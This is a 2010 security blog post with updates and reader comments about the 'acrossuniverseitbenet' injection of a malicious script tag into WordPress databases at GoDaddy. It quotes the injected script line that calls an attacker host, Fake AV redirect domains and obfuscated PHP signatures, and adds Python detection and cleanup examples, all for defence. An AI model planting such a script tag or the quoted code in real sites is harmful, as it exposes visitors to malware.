On December 22, 2010, we received several reports that a new malware attack (acrossuniverseitbenet) has infected WordPress sites hosted at GoDaddy and possibly other hosting providers.
The malware script injected is as follows:
(I have put spaces in the URL below for your protection, so you can't click it to open the site.)
<script src="http:// acrossuniverseitbenet .com/js.php?kk=10" > </script>
The worst part about this malware is that it's much harder to clean. The malicious hackers have stepped it up a notch and decided to infect the WordPress database and not just server files. The above script is injected inside every single page and post in the database (wp_posts table).
This malicious script redirects website visitors to various sites hosting "Fake AV" pages, some of which use zero-day attacks. A zero-day attack means that anti-virus programs may not yet have their definitions updated, so your computer can become infected even with up-to-date software.
Some of the Fake AV websites that the acrossuniverseitbenet redirects to are:
(I have put spaces in the URLs for your protection, so you can't click them.)
- ww23.smartsuite-4u .in
- ww3.top-s-can-foru .in
- www1.top-only-master .in
Here's a screen shot of one of the viruses caught by my AVG program:

Today, my computer was attacked three times and my AVG and MalwareBytes did not catch two of the viruses and I had to do a system restore to an earlier date.
I did not make a screen shot of the actual attacks, but it looked very similar to this:

As you can see by the above image, this can easily fool people into thinking they are looking at a folder on their Windows computer and not a web browser (look at the top where you can see the URL). It moves extremely fast and starts downloading tons of infectious files to your computer.
This Fake AV is very dangerous and can cripple your visitors' computers. It is strongly advised that you put your website in maintenance mode immediately until it is fixed.
How to safely put your WordPress Blog in Maintenance Mode:
- Rename your root index.php file to something else (for example: index-hold.php).
- Upload a "Down for Maintenance" index.html page to your root directory.
- Rename your wp-config.php file to something else so no other pages connect to the infected database (for example: wp-config-hold.php).
- Clear your cache and cookies.
- Visit your website's home page to make sure you can see the "Down for Maintenance" page.
If you do not have a blank index page, please feel free to use mine. All you have to do is unzip it and upload it to your root directory where your wp-config.php file is.
Important: Make sure you rename it to index.html so that your server recognizes it for the home page.
Server Files Found:
There have been numerous "mystery" files found on infected websites that were uploaded on November 10, 2010. We believe these were trigger files that were set to "go off" today.
An example file name is sdfssdf_dfsdf.php
Be sure you look through your server files for these trigger files and remove them ASAP.
Contact Your Hosting Company
If you're hosted with GoDaddy, please fill out a support ticket with their security team here.
If you are hosting with another hosting provider, please contact them as well.
How many WordPress sites are infected with acrossuniverseitbenet?
At this time, the number of WordPress sites hacked or the number of hosting providers affected is unclear.
We have been working with GoDaddy directly to help resolve this issue and will keep you updated as we receive more information. Any updates will be put on this blog post, so be sure to check back often. If you need help, feel free to contact us.
We need your feedback!
Has your site been infected with this malware attack? If so, are you on GoDaddy or with another hosting provider? Have you found any other redirect scripts? Please let us know by leaving a comment below.
Securely yours,
Regina Smola
UPDATE: 12/22/2010 at 5pm CST:
Currently, we are unable to connect via FTP/SFTP to any GoDaddy-hosted site infected with this malware. We are getting a critical error: 550 Login authentication failed. Could not connect to the server. We had to change the FTP password to get in again. Not sure if it was a malicious hacker that changed it or GoDaddy for protection.
UPDATE 12/22/2010 at 8:27PM CST:
Just found another trigger file on an infected website: fritz_rather.php, uploaded 11/13/2010 at 6:41am server time. This file must have been time-activated to go off today, when the site started redirecting this morning.
You should search your server files for any files that have suspicious names and also do a search for the following to identify any malicious code:
<'.'?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x6
And
global $totalinjected;
The malicious code may contain some or all of the above. Any file containing it should be deleted immediately.
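The two searches above (the "mystery" trigger files uploaded around November 10 and 13, and the code signatures quoted just above) can be done in one pass with a script like the following. This is an added example, not code from the original post or from WPSecurityLock: it walks a WordPress directory, flags any .php/.js/.html file containing one of the quoted signatures, and separately lists files whose modification time falls in the trigger-file upload window. The hex string quoted above decodes to "create_funct", the start of PHP's create_function(), which obfuscated injectors use to run decoded code. The mini site tree it scans is constructed inside the script (file names, contents and the assumed Nov 10-14, 2010 window are all constructed assumptions) so it runs offline; point scan() at a real document root instead to use it.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Literal strings quoted in the post. The "<?php" prefix is left out so the
# signature also fires when the code is appended to an existing file.
# The hex string decodes to "create_funct" (the start of create_function).
SIGNATURES = {
    "create_function_hex": r'$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74',
    "totalinjected_global": r"global $totalinjected;",
}
SIGNATURE_RES = {name: re.compile(re.escape(s)) for name, s in SIGNATURES.items()}
# The injected script tag itself, matched loosely on the domain and the
# js.php?kk= parameter so that a changed kk value is still caught.
SIGNATURE_RES["redirect_script"] = re.compile(
    r"<script[^>]*acrossuniverseitbenet[^>]*js\.php\?kk=\d+", re.IGNORECASE)

# Assumption: the trigger files reported in the post were uploaded on Nov 10
# and Nov 13, 2010, so the whole span is treated as suspicious.
WINDOW_START = datetime(2010, 11, 10, tzinfo=timezone.utc)
WINDOW_END = datetime(2010, 11, 14, tzinfo=timezone.utc)

SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")


def scan(root):
    """Walk root; return signature hits and files last modified in the window."""
    hits = {}
    in_window = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # never fails on odd bytes
            matched = sorted(n for n, rx in SIGNATURE_RES.items() if rx.search(text))
            if matched:
                hits[rel] = matched
            mtime = datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)
            if WINDOW_START <= mtime < WINDOW_END:
                in_window.append(rel)
    return {"signature_hits": hits, "modified_in_window": sorted(in_window)}


def build_sample_site(root):
    """Constructed mini WordPress tree: a clean config, an injected plugin
    file, a cached page carrying the script tag, and a trigger-dated file."""
    files = {
        "wp-config.php": "<?php\ndefine('DB_NAME', 'wordpress');\n",
        "wp-content/plugins/evil/evil.php": (
            "<?php\n/**/ $_8b7b=\"\\x63\\x72\\x65\\x61\\x74\\x65\\x5f"
            "\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\";\n"
            "function inject(){ global $totalinjected; $totalinjected++; }\n"),
        "wp-content/cache/page.html": (
            "<p>Hello</p>\n<script src=\"http://acrossuniverseitbenet.com/"
            "js.php?kk=10\" > </script>\n"),
        "sdfssdf_dfsdf.php": "<?php\n// looks harmless; the timestamp gives it away\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    # Backdate the trigger file to the upload window (constructed timestamp).
    ts = datetime(2010, 11, 10, 9, 0, tzinfo=timezone.utc).timestamp()
    os.utime(os.path.join(root, "sdfssdf_dfsdf.php"), (ts, ts))


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    build_sample_site(root)
    return scan(root)


if __name__ == "__main__":
    result = demo()
    for path, names in result["signature_hits"].items():
        print(f"SIGNATURE {path}: {', '.join(names)}")
    for path in result["modified_in_window"]:
        print(f"TRIGGER-WINDOW {path}")
```

A file appearing in either list is worth opening before deleting: the mtime list is a heuristic (a legitimate update in that week would also land there), while a signature hit is a confirmed match on the strings the post quotes.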
UPDATE 12/22/2010 at 9:39pm CST:
As you know we are working hard to fix as many websites as possible. Our good friends over at Sucuri have agreed to take on our overflow sites and get your sites fixed as soon as possible (generally within 4 hours).
You can get your hacked WordPress blog fixed here:
* http://www.wpsecuritylock.com/sucuri.
Open the above URL and scroll down to the "Have a single site with malware?" section and click the "Sign Up" button. And be sure to check out their Sucuri Web Integrity Monitor services for your website. We use it and recommend it to all our customers.
Don't let your customers tell you your site's hacked, let Sucuri alert you instead.
*Denotes our affiliate link, see our Disclosure.
UPDATE 12/22/2010 at 10:30pm CST:
Just had a great conversation with Willis. He has written a script for you to fix your infected WordPress databases. Be sure to read his instructions and download the fix here:
http://newmusicreviews.net/sqlquery.txt
Thanks again Willis. You rock!
Important: Be sure you make a backup of your database before running the above fix.
Once the database is fixed, be sure to change your FTP, GoDaddy, wp-admin and database passwords. (You'll have to update the new database password in your wp-config.php file.)
And be sure to change your Authentication Unique Keys and Salts (around line 45) of your wp-config.php file to reset the "crackers" cookies. (Crackers is old school in honor of Robert Nelson)
And double check your server for any mystery files with malicious script.
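To make the database side of the fix concrete, here is an added example that is not Willis's script and not code from the original post: it reproduces the approach against an in-memory SQLite copy of wp_posts (the table layout and the three sample rows are constructed here so it runs offline). It first counts the infected rows without writing anything (the dry run you would do after taking the backup mentioned above), then strips every matching script tag with a regex and writes each row back. Matching the tag with a pattern rather than a fixed REPLACE string means a variant with a different kk= value or extra whitespace, like the spaced tag shown at the top of the post, is still removed. Against a live site the same queries would run over MySQL.

```python
import re
import sqlite3

# Loose match on the injected tag: any <script> whose attributes mention the
# domain, followed by optional whitespace and the closing tag.
INJECTED = re.compile(
    r"<script[^>]*acrossuniverseitbenet[^>]*>\s*</script>", re.IGNORECASE)

# Constructed rows in the shape of wp_posts (ID, post_title, post_content).
SAMPLE_POSTS = [
    (1, "Hello world!",
     "<p>Welcome.</p>\n<script src=\"http://acrossuniverseitbenet.com/js.php?kk=10\" > </script>"),
    (2, "About",
     "<script src=\"http://acrossuniverseitbenet.com/js.php?kk=10\"></script><p>About us.</p>"),
    (3, "Clean post", "<p>Nothing injected here.</p>"),
]


def open_sample_db():
    """Build the constructed wp_posts table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", SAMPLE_POSTS)
    conn.commit()
    return conn


def _candidate_rows(conn):
    # LIKE narrows the scan to rows mentioning the domain; the regex decides.
    return conn.execute(
        "SELECT ID, post_content FROM wp_posts "
        "WHERE post_content LIKE '%acrossuniverseitbenet%'").fetchall()


def find_infected(conn):
    """IDs of posts whose content still carries the injected tag."""
    return [pid for pid, content in _candidate_rows(conn) if INJECTED.search(content)]


def clean_posts(conn, dry_run=False):
    """Strip the tag from every infected row; return the number of rows
    that would change (dry_run=True) or did change."""
    changed = 0
    for pid, content in _candidate_rows(conn):
        cleaned, n = INJECTED.subn("", content)
        if n == 0:
            continue
        changed += 1
        if not dry_run:
            conn.execute(
                "UPDATE wp_posts SET post_content = ? WHERE ID = ?", (cleaned, pid))
    if not dry_run:
        conn.commit()
    return changed


if __name__ == "__main__":
    db = open_sample_db()
    print("infected before:", find_infected(db))
    print("rows to clean (dry run):", clean_posts(db, dry_run=True))
    print("rows cleaned:", clean_posts(db))
    print("infected after:", find_infected(db))
```

Run find_infected() once more after cleaning: if it still returns IDs, the injected tag has a shape the pattern does not cover and the remaining rows need to be looked at by hand rather than cleaned blindly.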
UPDATE 12/23/2010 2:50PM
GoDaddy has released a Security Update on their community blog regarding this malware attack. Read "Security Update: Malware Affecting Some Databases."

GoDaddy is suppressing the obvious, and why should they care if it creates a need for people to spend more money. Also, what's obvious to me here is that everyone needs to be aware that the number one attack method is for bot herders and exploit attackers to manifest scripts into your .js (javascript) files via open ftp connections.
Don't use ftp, use a "Shell" or at a minimum sftp. sftp is either something your host offers free or as an add-on. Not having it is quite costly especially if you run multiple blogs BECAUSE: Once you have an "open" ftp connection established with FileZilla or whatever your FTP client is, the intercepting bots can install the malicious scripts (usually a big chunk of code starting with "<try" at the bottom of the file) in all your blogs running on that server simultaneously in hundreds of places. Icky stuff indeed.
The best fix and this is NOT for the meek or unfamiliar - do this: ZIP your entire site via your file control panel and download it to your computer. DO NOT use ftp and DO NOT unzip the files. Scan them with AVAST or another reputable scanner. It will tell you the exact locations of all the bad scripts whether they be in wp-contents, plugins, themes, includes etc. Then you can easily go into each file using your online editor and simply erase the script or replace it with a new clean copy.
Not an easy process, but if you've ever had 10 blogs infected at once, you will be better prepared in the future to never have this happen again.
hope this helps,
stu
Hi Stu,
Excellent advice! Thanks so much for your comment and sharing.
I never use anything less than SFTP unless the site I'm working on doesn't have it enabled. Then I advise my client to have it enabled by their host or move to a hosting provider that has it.
What's amazing to me is how many sites I work on that are hacked, still on PHP 4, WordPress 2.8x, 15+ outdated plugins, a username as admin, and a password of password123 for everything.
All we can do is spread the word on how to be safe and give advice, like your info about scanning site files with AVAST and using SFTP as a minimum. Thanks again!
My pleasure Regina.
If someone takes the time to do a real self hosted WordPress install from scratch, they obviously made the effort to understand that it's just a little harder than falling off a log - but you gotta hand it to them, they wanted to get online and blog - which is the beauty of the software - staying up to date with it is a matter that can trail behind after they made the initial effort. Then of course you have the fantastico and other script installers which may seem easier but can cause headaches down the road . . . of which you are well aware.
By the time I go through 20 client blogs in a week of update work, I sit back and say, "Ok, which one did I miss". lol
See ya on the other side.
Stu
You are so right, Stu. I love WordPress, and yes there are updates to do, but that happens with any content management system. A little elbow grease goes a long way.
Maybe this is a topic for another thread, what security issues have you seen with installing WP with software installers like Fantastico, SimpleScripts, Softaculous etc?
Hi Roy,
Thanks for your question. There are security risks using auto installers. I will create a post tomorrow showing the risks of using auto installers for WordPress.
Just added my review of why not to use auto installers, like Fantastico. You can read it here.
My site was one that was affected by this attack. I host with GoDaddy and when I first contacted them about the problem, they denied that there was a problem. I immediately signed up with Sucuri and they cleaned my site. When I called GoDaddy back about it and filled out a support ticket to at least let them know that my site was affected, I was told that security of my site was my problem, not theirs. I am looking to change hosting companies now.
Good thinking BikeCatGal, I would suggest HostGator. Only thing GoDaddy is good for is registration of domain names and even then there are probably cheaper deals available
I second that Robert! I've never had a problem with my domains being registered at GoDaddy. Plus, the domain manager interface is great. I also host with HG.
Yikes! Not a very good response, but ultimately you're responsible to have a secure website for your visitors, which includes hosting it somewhere that's safe. A good one is HostGator (that's my affiliate link). To save, enter in our coupon code: wpsecuritylock